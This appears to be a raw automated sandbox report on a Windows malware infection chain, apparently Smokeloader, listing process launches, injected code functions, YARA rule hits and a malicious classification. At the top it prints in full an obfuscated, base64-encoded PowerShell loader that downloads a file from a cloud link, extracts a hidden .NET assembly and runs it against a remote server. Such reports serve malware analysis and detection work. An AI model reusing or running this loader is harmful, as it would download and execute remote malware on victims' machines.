W4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"Jump to behavior
              Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_00402F5D RtlCreateUserThread,NtTerminateProcess,13_2_00402F5D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,13_2_00402321
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004025D3 NtClose,13_2_004025D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014D6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014EB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_00402686 NtClose,13_2_00402686
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_004030BF RtlCreateUserThread,NtTerminateProcess,13_2_004030BF
              Source: C:\Windows\explorer.exeCode function: 14_2_02494760 NtCreateSection,14_2_02494760
              Source: C:\Windows\explorer.exeCode function: 14_2_02492FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,14_2_02492FAC
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02974B92 RtlMoveMemory,NtUnmapViewOfSection,19_2_02974B92
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_029733C3 NtQueryInformationFile,19_2_029733C3
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0297349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,19_2_0297349B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0297342B NtQueryObject,NtQueryObject,RtlMoveMemory,19_2_0297342B
              Source: C:\Windows\explorer.exeCode function: 20_2_00FD38B0 NtUnmapViewOfSection,20_2_00FD38B0
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_03201016 RtlMoveMemory,NtUnmapViewOfSection,21_2_03201016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C23D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,22_2_02C23D8D
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C21F4E NtCreateSection,NtMapViewOfSection,22_2_02C21F4E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C21FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_02C21FE5
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C22E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,22_2_02C22E1B
              Source: C:\Windows\explorer.exeCode function: 23_2_00A05300 NtUnmapViewOfSection,23_2_00A05300
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_02A21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,24_2_02A21016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_02A21A80 NtCreateSection,NtMapViewOfSection,24_2_02A21A80
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_02A21819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,24_2_02A21819
              Source: C:\Windows\explorer.exeCode function: 28_2_0014355C NtUnmapViewOfSection,28_2_0014355C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 30_2_00151016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,30_2_00151016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 30_2_001518BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,30_2_001518BF
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 30_2_00151B26 NtCreateSection,NtMapViewOfSection,30_2_00151B26
              Source: C:\Windows\explorer.exeCode function: 31_2_00AC370C NtUnmapViewOfSection,31_2_00AC370C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_044C941C10_2_044C941C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_044C2C8010_2_044C2C80
              Source: C:\Windows\explorer.exeCode function: 14_2_0249284014_2_02492840
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0297219819_2_02972198
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0297C2F919_2_0297C2F9
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0298B35C19_2_0298B35C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_029C443819_2_029C4438
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0298B97E19_2_0298B97E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02976E6A19_2_02976E6A
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02995F0819_2_02995F08
              Source: C:\Windows\explorer.exeCode function: 20_2_00FD1E2020_2_00FD1E20
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0320170B21_2_0320170B
              Source: C:\Windows\explorer.exeCode function: 23_2_00A02C0023_2_00A02C00
              Source: C:\Windows\explorer.exeCode function: 28_2_0014205428_2_00142054
              Source: C:\Windows\explorer.exeCode function: 28_2_0014286028_2_00142860
              Source: C:\Windows\explorer.exeCode function: 31_2_00AC2A0431_2_00AC2A04
              Source: C:\Windows\explorer.exeCode function: 31_2_00AC20F431_2_00AC20F4
              Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02978801 appears 40 times
              Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02977F70 appears 32 times
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4232 -s 704
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2246
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2246Jump to behavior
              Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winHTA@42/37@3/4
              Source: C:\Windows\explorer.exeCode function: 14_2_02493BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,14_2_02493BF4
              Source: C:\Windows\explorer.exeCode function: 14_2_024935E8 CoCreateInstance,14_2_024935E8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\seethebestthingsentiretimewithgreatthignstoebe[1].tiffJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\wihaduvMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4232
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpuuo5cn.rgw.ps1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
